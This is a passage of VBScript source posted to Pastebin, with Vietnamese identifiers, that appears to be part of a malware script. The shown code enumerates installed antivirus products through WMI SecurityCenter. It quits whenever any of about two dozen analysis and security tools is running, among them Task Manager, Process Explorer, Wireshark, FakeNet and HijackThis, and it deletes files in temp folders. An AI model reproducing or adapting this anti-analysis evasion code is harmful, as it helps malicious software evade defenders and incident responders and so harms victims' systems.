  411. next
  412. PHIEN_BAN_AV = split(CAC_DT_THEO_COT_HDH.version,".")
  413. PHIEN_BAN_HDH = PHIEN_BAN_AV (0) & "."
  414. for x = 1 to ubound(PHIEN_BAN_AV)
  415. PHIEN_BAN_HDH = PHIEN_BAN_HDH & PHIEN_BAN_AV(i)
  416. next
  417. PHIEN_BAN_HDH = eval(PHIEN_BAN_HDH)
  418. if PHIEN_BAN_HDH > 6 then TRUNG_TAM_SECU = "securitycenter2" else TRUNG_TAM_SECU = "securitycenter"
  419. set DT_TRUNG_TAM_SECU = getobject("winmgmts:\\localhost\root\" & TRUNG_TAM_SECU)
  420. set COT_AV = DT_TRUNG_TAM_SECU.execquery("select * from antivirusproduct","wql",0)
  421. for each TEN_AV in COT_AV
  422. HAM_LAY_TEN_TRINH_AV = HAM_LAY_TEN_TRINH_AV & TEN_AV.displayname & " ."
  423. next
  424. if HAM_LAY_TEN_TRINH_AV = "" then HAM_LAY_TEN_TRINH_AV = "None AV"
  425. end function
  426. sub CHONG_CAC_PROC
  427. on error resume next
  428. CHUOI_PC = "."
  429. set DT_WIN_MGR = GetObject("winmgmts:" _
  430. & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
  431. set TTR_MOT = DT_WIN_MGR.ExecQuery _
  432. ("SELECT * FROM Win32_Process WHERE Name = " & _
  433. "'taskmgr.exe'")
  434. set TTR_HAI = DT_WIN_MGR.ExecQuery _
  435. ("SELECT * FROM Win32_Process WHERE Name = " & _
  436. "'processhacker.exe'")
  437. set TTR_BA = DT_WIN_MGR.ExecQuery _
  438. ("SELECT * FROM Win32_Process WHERE Name = " & _
  439. "'procexp.exe'")
  440. set TTR_BON = DT_WIN_MGR.ExecQuery _
  441. ("SELECT * FROM Win32_Process WHERE Name = " & _
  442. "'apatedns.exe'")
  443. set TTR_NAM = DT_WIN_MGR.ExecQuery _
  444. ("SELECT * FROM Win32_Process WHERE Name = " & _
  445. "'fakenet.exe'")
  446. set TTR_SAU = DT_WIN_MGR.ExecQuery _
  447. ("SELECT * FROM Win32_Process WHERE Name = " & _
  448. "'fab.exe'")
  449. set TTR_BAY = DT_WIN_MGR.ExecQuery _
  450. ("SELECT * FROM Win32_Process WHERE Name = " & _
  451. "'cports.exe'")
  452. set TTR_TAM = DT_WIN_MGR.ExecQuery _
  453. ("SELECT * FROM Win32_Process WHERE Name = " & _
  454. "'smsniff.exe'")
  455. set TTR_CHIN_1 = DT_WIN_MGR.ExecQuery _
  456. ("SELECT * FROM Win32_Process WHERE Name = " & _
  457. "'pchunter32.exe'")
  458. set TTR_CHIN_2 = DT_WIN_MGR.ExecQuery _
  459. ("SELECT * FROM Win32_Process WHERE Name = " & _
  460. "'pchunter64.exe'")
  461. set TTR_MUOI = DT_WIN_MGR.ExecQuery _
  462. ("SELECT * FROM Win32_Process WHERE Name = " & _
  463. "'roguekiller.exe'")
  464. set TTR_MUOI_MOT = DT_WIN_MGR.ExecQuery _
  465. ("SELECT * FROM Win32_Process WHERE Name = " & _
  466. "'spybhoremover.exe'")
  467. set TTR_MUOI_HAI = DT_WIN_MGR.ExecQuery _
  468. ("SELECT * FROM Win32_Process WHERE Name = " & _
  469. "'defenderdaemon.exe'")
  470. set TTR_MUOI_BA = DT_WIN_MGR.ExecQuery _
  471. ("SELECT * FROM Win32_Process WHERE Name = " & _
  472. "'HijackThis.exe'")
  473. set TTR_MUOI_BON = DT_WIN_MGR.ExecQuery _
  474. ("SELECT * FROM Win32_Process WHERE Name = " & _
  475. "'Wireshark.exe'")
  476. set TTR_MUOI_LAM = DT_WIN_MGR.ExecQuery _
  477. ("SELECT * FROM Win32_Process WHERE Name = " & _
  478. "'Vbs Lookup.exe'")
  479. set TTR_MUOI_SAU = DT_WIN_MGR.ExecQuery _
  480. ("SELECT * FROM Win32_Process WHERE Name = " & _
  481. "'Vbs Killer.exe'")
  482. set TTR_MUOI_BAY = DT_WIN_MGR.ExecQuery _
  483. ("SELECT * FROM Win32_Process WHERE Name = " & _
  484. "'Vbs Deleter.exe'")
  485. set TTR_MUOI_TAM = DT_WIN_MGR.ExecQuery _
  486. ("SELECT * FROM Win32_Process WHERE Name = " & _
  487. "'sandboxierpcss.exe'")
  488. set TTR_MUOI_CHIN = DT_WIN_MGR.ExecQuery _
  489. ("SELECT * FROM Win32_Process WHERE Name = " & _
  490. "'netagent.exe'")
  491. set TTR_HAI_MUOI = DT_WIN_MGR.ExecQuery _
  492. ("SELECT * FROM Win32_Process WHERE Name = " & _
  493. "'tiger-Firewall.exe'")
  494. set TTR_HAI_MUOI_MOT = DT_WIN_MGR.ExecQuery _
  495. ("SELECT * FROM Win32_Process WHERE Name = " & _
  496. "'TcpView.exe'")
  497. set TTR_HAI_MUOI_HAI = DT_WIN_MGR.ExecQuery _
  498. ("SELECT * FROM Win32_Process WHERE Name = " & _
  499. "'ProcessLasso.exe'")
  500. set TTR_HAI_MUOI_BA = DT_WIN_MGR.ExecQuery _
  501. ("SELECT * FROM Win32_Process WHERE Name = " & _
  502. "'Active Ports.exe'")
  503. set TTR_HAI_MUOI_BON = DT_WIN_MGR.ExecQuery _
  504. ("SELECT * FROM Win32_Process WHERE Name = " & _
  505. "'SystemExplorer.exe'")
  506. if TTR_MOT.Count = 1 or TTR_HAI.Count = 1 or TTR_BA.Count = 1 or TTR_BON.Count = 1 or TTR_NAM.Count = 1 or TTR_SAU.Count = 1 or TTR_BAY.Count = 1 or TTR_TAM.Count = 1 then
  507. wscript.quit
  508. end if
  509. if TTR_CHIN_1.Count = 1 or TTR_CHIN_2.Count = 1 or TTR_MUOI.Count = 1 or TTR_MUOI_MOT.Count = 1 or TTR_MUOI_HAI.Count = 1 or TTR_MUOI_BA.Count = 1 or TTR_MUOI_BON.Count = 1 then
  510. wscript.quit
  511. end if
  512. if TTR_MUOI_LAM.Count = 1 or TTR_MUOI_SAU.Count = 1 or TTR_MUOI_BAY.Count = 1 or TTR_MUOI_TAM.Count = 1 or TTR_MUOI_CHIN.Count = 1 or TTR_HAI_MUOI.Count = 1 or TTR_HAI_MUOI_MOT.Count = 1 or TTR_HAI_MUOI_HAI.Count = 1 or TTR_HAI_MUOI_BA.Count = 1 or TTR_HAI_MUOI_BON.Count = 1 then
  513. wscript.quit
  514. end if
  515. end sub
  516. sub XOA_TEMP_SAU_X_NGAY_SUB(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
  517. On Error Resume Next
  518. dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
  519. dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
  520. dim OBJ_CAC_FILE_TEMP
  521. dim i
  522. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
  523. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
  524. For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
  525. If OBJ_CAC_FILE_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_FILE_TEMP.delete(True) End If
  526. Next
  527. For i = 0 To 10
  528. For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
  529. If OBJ_CAC_DIR_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_DIR_TEMP.Delete(True) End If
  530. Next
  531. Next
  532. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
  533. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
  534. set OBJ_CAC_DIR_TEMP = Nothing
  535. set OBJ_CAC_FILE_TEMP = Nothing
  536. end sub
  537. sub XOA_TEMP_SUB_LUC_GO(STR_DUONG_DAN_TEMP_IN_SUB)
  538. On Error Resume Next
  539. dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
  540. dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
  541. dim OBJ_CAC_FILE_TEMP
  542. dim i
  543. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
  544. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB)
  545. For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
  546. OBJ_CAC_FILE_TEMP.delete(True)
  547. Next
  548. For i = 0 To 10
  549. For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
  550. OBJ_CAC_DIR_TEMP.Delete(True)
  551. Next
  552. Next
  553. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
  554. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
  555. set OBJ_CAC_DIR_TEMP = Nothing
  556. set OBJ_CAC_FILE_TEMP = Nothing
  557. end sub"
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!